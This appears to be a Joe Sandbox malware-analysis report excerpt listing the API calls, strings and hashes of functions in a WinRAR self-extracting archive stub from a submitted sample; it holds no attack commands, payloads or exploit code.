                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 002EE05A
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 002EE061
                                        • LoadIconW.USER32(00000000,00000064), ref: 002EE078
                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 002EE0C9
                                        • Sleep.KERNEL32(?), ref: 002EE0F7
                                        • DeleteObject.GDI32 ref: 002EE130
                                        • DeleteObject.GDI32(?), ref: 002EE140
                                        • CloseHandle.KERNEL32 ref: 002EE183
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz2
                                        • API String ID: 3049964643-2627256826
                                        • Opcode ID: 87f77b40214cdd033d0fd2a4e4b2783ea44009b3c87fbc90cd37ada8d8728ffa
                                        • Instruction ID: a4481743f175d570045f3b595ce7024e53dcfe8327bce100651ee16d82180558
                                        • Opcode Fuzzy Hash: 87f77b40214cdd033d0fd2a4e4b2783ea44009b3c87fbc90cd37ada8d8728ffa
                                        • Instruction Fuzzy Hash: 31616771955385AFD722AFB6EC59FAB37ACAB0C700F40002AF90A92291DF749D54CB61

                                        Control-flow Graph

                                        APIs
                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,002EB73D,00000066), ref: 002EA6D5
                                        • SizeofResource.KERNEL32(00000000,?,?,?,002EB73D,00000066), ref: 002EA6EC
                                        • LoadResource.KERNEL32(00000000,?,?,?,002EB73D,00000066), ref: 002EA703
                                        • LockResource.KERNEL32(00000000,?,?,?,002EB73D,00000066), ref: 002EA712
                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,002EB73D,00000066), ref: 002EA72D
                                        • GlobalLock.KERNEL32(00000000), ref: 002EA73E
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 002EA762
                                        • GlobalUnlock.KERNEL32(00000000), ref: 002EA7C6
                                          • Part of subcall function 002EA626: GdipAlloc.GDIPLUS(00000010), ref: 002EA62C
                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 002EA7A7
                                        • GlobalFree.KERNEL32(00000000), ref: 002EA7CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                        • String ID: Fjun.$PNG
                                        • API String ID: 211097158-3291020314
                                        • Opcode ID: 37356b51feb33a79e405eeb836921483997db0e2e1140379822aeb41e9246039
                                        • Instruction ID: d8718899f9999f0295bf74d58c4c43d34c09ec67727ef8109dc435a755163fc8
                                        • Opcode Fuzzy Hash: 37356b51feb33a79e405eeb836921483997db0e2e1140379822aeb41e9246039
                                        • Instruction Fuzzy Hash: E031B375651342AFD7129F22EC98D5BBFBDEF8D750F040519F90582260EB31ED60CAA2

                                        Control-flow Graph

                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,002DA592,000000FF,?,?), ref: 002DA6C4
                                          • Part of subcall function 002DBB03: _wcslen.LIBCMT ref: 002DBB27
                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,002DA592,000000FF,?,?), ref: 002DA6F2
                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,002DA592,000000FF,?,?), ref: 002DA6FE
                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,002DA592,000000FF,?,?), ref: 002DA728
                                        • GetLastError.KERNEL32(?,?,?,?,002DA592,000000FF,?,?), ref: 002DA734
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                        • String ID:
                                        • API String ID: 42610566-0
                                        • Opcode ID: eeaa75869fe4274646df38c35a0fa309d38c543ae8bc83deb8e9e5fcf7348090
                                        • Instruction ID: 52fe944c79d3531c4433d430783e6ec6f20f73886a6630cc2c59986f7f70c6a5
                                        • Opcode Fuzzy Hash: eeaa75869fe4274646df38c35a0fa309d38c543ae8bc83deb8e9e5fcf7348090
                                        • Instruction Fuzzy Hash: BD418F72911155ABCB25DF64CC84AEEF7B8FB48350F104197E95AE3200D774AEA0CF91
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,?,002F7DC4,00000000,0030C300,0000000C,002F7F1B,00000000,00000002,00000000), ref: 002F7E0F
                                        • TerminateProcess.KERNEL32(00000000,?,002F7DC4,00000000,0030C300,0000000C,002F7F1B,00000000,00000002,00000000), ref: 002F7E16
                                        • ExitProcess.KERNEL32 ref: 002F7E28
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 4463961274cb8bb3cdeb8a61e75c711578d9947bb5cbf9f3ec1bb442873ec145
                                        • Instruction ID: 515c6e76d9d357c70020ba5f7e297b219e297add2d3e0990f754b94ec3d42716
                                        • Opcode Fuzzy Hash: 4463961274cb8bb3cdeb8a61e75c711578d9947bb5cbf9f3ec1bb442873ec145
                                        • Instruction Fuzzy Hash: 68E04F3101214CABDF066F10CD09A59BF6DEB10381F104466FA158A132CB35DE62CA80
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: fa8083a5c4325a09f52deaf1355fa1606d6ca918228dae9d09ddb51d22cf3110
                                        • Instruction ID: 739efee08c229e08622257d01769635b245f7053e9a64dae6d04576ee765edba
                                        • Opcode Fuzzy Hash: fa8083a5c4325a09f52deaf1355fa1606d6ca918228dae9d09ddb51d22cf3110
                                        • Instruction Fuzzy Hash: 4B821F70924146AEDF15DF64C895BFAB7B9BF05300F0841BBE8499B382DB715EA4CB60
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002EB7E5
                                          • Part of subcall function 002D1316: GetDlgItem.USER32(00000000,00003021), ref: 002D135A
                                          • Part of subcall function 002D1316: SetWindowTextW.USER32(00000000,003035F4), ref: 002D1370
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 002EB8D1
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002EB8EF
                                        • IsDialogMessageW.USER32(?,?), ref: 002EB902
                                        • TranslateMessage.USER32(?), ref: 002EB910
                                        • DispatchMessageW.USER32(?), ref: 002EB91A
                                        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 002EB93D
                                        • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 002EB960
                                        • GetDlgItem.USER32(?,00000068), ref: 002EB983
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 002EB99E
                                        • SendMessageW.USER32(00000000,000000C2,00000000,003035F4), ref: 002EB9B1
                                          • Part of subcall function 002ED453: _wcschr.LIBVCRUNTIME ref: 002ED45C
                                          • Part of subcall function 002ED453: _wcslen.LIBCMT ref: 002ED47D
                                        • SetFocus.USER32(00000000), ref: 002EB9B8
                                        • _swprintf.LIBCMT ref: 002EBA24
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                          • Part of subcall function 002ED4D4: GetDlgItem.USER32(00000068,0032FCB8), ref: 002ED4E8
                                          • Part of subcall function 002ED4D4: ShowWindow.USER32(00000000,00000005,?,?,?,002EAF07,00000001,?,?,002EB7B9,0030506C,0032FCB8,0032FCB8,00001000,00000000,00000000), ref: 002ED510
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 002ED51B
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,003035F4), ref: 002ED529
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002ED53F
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 002ED559
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002ED59D
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 002ED5AB
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002ED5BA
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002ED5E1
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,003043F4), ref: 002ED5F0
                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 002EBA68
                                        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 002EBA90
                                        • GetTickCount.KERNEL32 ref: 002EBAAE
                                        • _swprintf.LIBCMT ref: 002EBAC2
                                        • GetLastError.KERNEL32(?,00000011), ref: 002EBAF4
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 002EBB43
                                        • _swprintf.LIBCMT ref: 002EBB7C
                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 002EBBD0
                                        • GetCommandLineW.KERNEL32 ref: 002EBBEA
                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 002EBC47
                                        • ShellExecuteExW.SHELL32(0000003C), ref: 002EBC6F
                                        • Sleep.KERNEL32(00000064), ref: 002EBCB9
                                        • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 002EBCE2
                                        • CloseHandle.KERNEL32(00000000), ref: 002EBCEB
                                        • _swprintf.LIBCMT ref: 002EBD1E
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 002EBD7D
                                        • SetDlgItemTextW.USER32(?,00000065,003035F4), ref: 002EBD94
                                        • GetDlgItem.USER32(?,00000065), ref: 002EBD9D
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 002EBDAC
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002EBDBB
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 002EBE68
                                        • _wcslen.LIBCMT ref: 002EBEBE
                                        • _swprintf.LIBCMT ref: 002EBEE8
                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 002EBF32
                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 002EBF4C
                                        • GetDlgItem.USER32(?,00000068), ref: 002EBF55
                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 002EBF6B
                                        • GetDlgItem.USER32(?,00000066), ref: 002EBF85
                                        • SetWindowTextW.USER32(00000000,0031A472), ref: 002EBFA7
                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 002EC007
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 002EC01A
                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 002EC0BD
                                        • EnableWindow.USER32(00000000,00000000), ref: 002EC197
                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 002EC1D9
                                          • Part of subcall function 002EC73F: __EH_prolog.LIBCMT ref: 002EC744
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 002EC1FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<.$STARTDLG$^.$__tmp_rar_sfx_access_check_%u$h.$winrarsfxmappingfile.tmp$Q0
                                        • API String ID: 3829768659-673372891
                                        • Opcode ID: a040cd09d2138fe55347c35d5a9a20d45190d9247c4a185304624a14cb8a43a3
                                        • Instruction ID: ba29931f1231dd4ca3a0cd6b04530c7b1ecbfa4887ff75281bcd031e39024ad1
                                        • Opcode Fuzzy Hash: a040cd09d2138fe55347c35d5a9a20d45190d9247c4a185304624a14cb8a43a3
                                        • Instruction Fuzzy Hash: 96421270DA4295BEEB23AFA29C8AFBF376CAB05700F504055F604A61D2CB745E65CF21

                                        Control-flow Graph

                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 002E087C
                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002E088E
                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002E08BF
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002E0B69
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E0B83
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002E0B93
                                        • ReadFile.KERNEL32(00000000,?,00007FFE,|<0,00000000), ref: 002E0BB1
                                        • CloseHandle.KERNEL32(00000000), ref: 002E0C09
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002E0C1E
                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<0,?,00000000,?,00000800), ref: 002E0C72
                                        • GetFileAttributesW.KERNELBASE(?,?,|<0,00000800,?,00000000,?,00000800), ref: 002E0C9C
                                        • GetFileAttributesW.KERNEL32(?,?,D=0,00000800), ref: 002E0CD8
                                          • Part of subcall function 002E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002E0836
                                          • Part of subcall function 002E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,002DF2D8,Crypt32.dll,00000000,002DF35C,?,?,002DF33E,?,?,?), ref: 002E0858
                                        • _swprintf.LIBCMT ref: 002E0D4A
                                        • _swprintf.LIBCMT ref: 002E0D96
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                        • AllocConsole.KERNEL32 ref: 002E0D9E
                                        • GetCurrentProcessId.KERNEL32 ref: 002E0DA8
                                        • AttachConsole.KERNEL32(00000000), ref: 002E0DAF
                                        • _wcslen.LIBCMT ref: 002E0DC4
                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 002E0DD5
                                        • WriteConsoleW.KERNEL32(00000000), ref: 002E0DDC
                                        • Sleep.KERNEL32(00002710), ref: 002E0DE7
                                        • FreeConsole.KERNEL32 ref: 002E0DED
                                        • ExitProcess.KERNEL32 ref: 002E0DF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                        • String ID: (=0$,<0$,@0$0?0$0A0$4B0$8>0$D=0$DXGIDebug.dll$H?0$H@0$HA0$P>0$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=0$`@0$d?0$dA0$dwmapi.dll$h=0$h>0$kernel32$uxtheme.dll$|<0$|?0$|@0$<0$>0$?0$@0$A0
                                        • API String ID: 1207345701-2421637091
                                        • Opcode ID: 9c16b889e855b51321cc2a2b2997095f013ee3260297a9e7f25aa9a9534d87a6
                                        • Instruction ID: a17d8a587442b0dcfd7c3fdd7ce96b6419a6bb5690c294c6720606367e4baec4
                                        • Opcode Fuzzy Hash: 9c16b889e855b51321cc2a2b2997095f013ee3260297a9e7f25aa9a9534d87a6
                                        • Instruction Fuzzy Hash: DBD184B505A385ABD322DF51C8A8B9FBBECFF85704F50491EF28596190C7B08649CB62

                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002EC744
                                          • Part of subcall function 002EB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 002EB3FB
                                          • Part of subcall function 002EAF98: _wcschr.LIBVCRUNTIME ref: 002EB033
                                        • _wcslen.LIBCMT ref: 002ECA0A
                                        • _wcslen.LIBCMT ref: 002ECA13
                                        • SetWindowTextW.USER32(?,?), ref: 002ECA71
                                        • _wcslen.LIBCMT ref: 002ECAB3
                                        • _wcsrchr.LIBVCRUNTIME ref: 002ECBFB
                                        • GetDlgItem.USER32(?,00000066), ref: 002ECC36
                                        • SetWindowTextW.USER32(00000000,?), ref: 002ECC46
                                        • SendMessageW.USER32(00000000,00000143,00000000,0031A472), ref: 002ECC54
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002ECC7F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                        • String ID: %s.%d.tmp$<br>$<.$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$.
                                        • API String ID: 986293930-2128744728
                                        • Opcode ID: 8dbeb9967c5222f9b148a8e9cdb6e608013896c9127eebd36a0de6e803b89762
                                        • Instruction ID: dd0262d869d9972d2da10f255bc224f4b0b26a75151dc84278c1bd32990633c7
                                        • Opcode Fuzzy Hash: 8dbeb9967c5222f9b148a8e9cdb6e608013896c9127eebd36a0de6e803b89762
                                        • Instruction Fuzzy Hash: CDE1A672950259AADF25EBA1DC85EEF73BCAF04350F9040A6F609E3140EB749F958F60
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002DDA70
                                        • _wcschr.LIBVCRUNTIME ref: 002DDA91
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002DDAAC
                                          • Part of subcall function 002DC29A: _wcslen.LIBCMT ref: 002DC2A2
                                          • Part of subcall function 002E05DA: _wcslen.LIBCMT ref: 002E05E0
                                          • Part of subcall function 002E1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,002DBAE9,00000000,?,?,?,00010456), ref: 002E1BA0
                                        • _wcslen.LIBCMT ref: 002DDDE9
                                        • __fprintf_l.LIBCMT ref: 002DDF1C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$90
                                        • API String ID: 557298264-2587909306
                                        • Opcode ID: 9f6ae131b8b8e81daafdfd4cdde88cbd417b773250d2d1c539514beba34007c5
                                        • Instruction ID: a3197873c6c743d50e175d015407ed0a838ff9ceaed971fe5819ea2f61bf8a28
                                        • Opcode Fuzzy Hash: 9f6ae131b8b8e81daafdfd4cdde88cbd417b773250d2d1c539514beba34007c5
                                        • Instruction Fuzzy Hash: 1732F271A20209ABCF25EF68C845BEA77A8FF14300F41016BFA059B381E7B1DDA5CB50

                                        APIs
                                          • Part of subcall function 002EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002EB579
                                          • Part of subcall function 002EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002EB58A
                                          • Part of subcall function 002EB568: IsDialogMessageW.USER32(00010456,?), ref: 002EB59E
                                          • Part of subcall function 002EB568: TranslateMessage.USER32(?), ref: 002EB5AC
                                          • Part of subcall function 002EB568: DispatchMessageW.USER32(?), ref: 002EB5B6
                                        • GetDlgItem.USER32(00000068,0032FCB8), ref: 002ED4E8
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,002EAF07,00000001,?,?,002EB7B9,0030506C,0032FCB8,0032FCB8,00001000,00000000,00000000), ref: 002ED510
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 002ED51B
                                        • SendMessageW.USER32(00000000,000000C2,00000000,003035F4), ref: 002ED529
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002ED53F
                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 002ED559
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002ED59D
                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 002ED5AB
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002ED5BA
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002ED5E1
                                        • SendMessageW.USER32(00000000,000000C2,00000000,003043F4), ref: 002ED5F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                        • String ID: \
                                        • API String ID: 3569833718-2967466578
                                        • Opcode ID: 2e238dfa77d6822f1309475287e9f46fab7eb1594695f235130c76fb11c9b62d
                                        • Instruction ID: 58eab8b079fac8e1b02f173159e1f6fc3377eff22ef50f65b4fb0c5f69af21eb
                                        • Opcode Fuzzy Hash: 2e238dfa77d6822f1309475287e9f46fab7eb1594695f235130c76fb11c9b62d
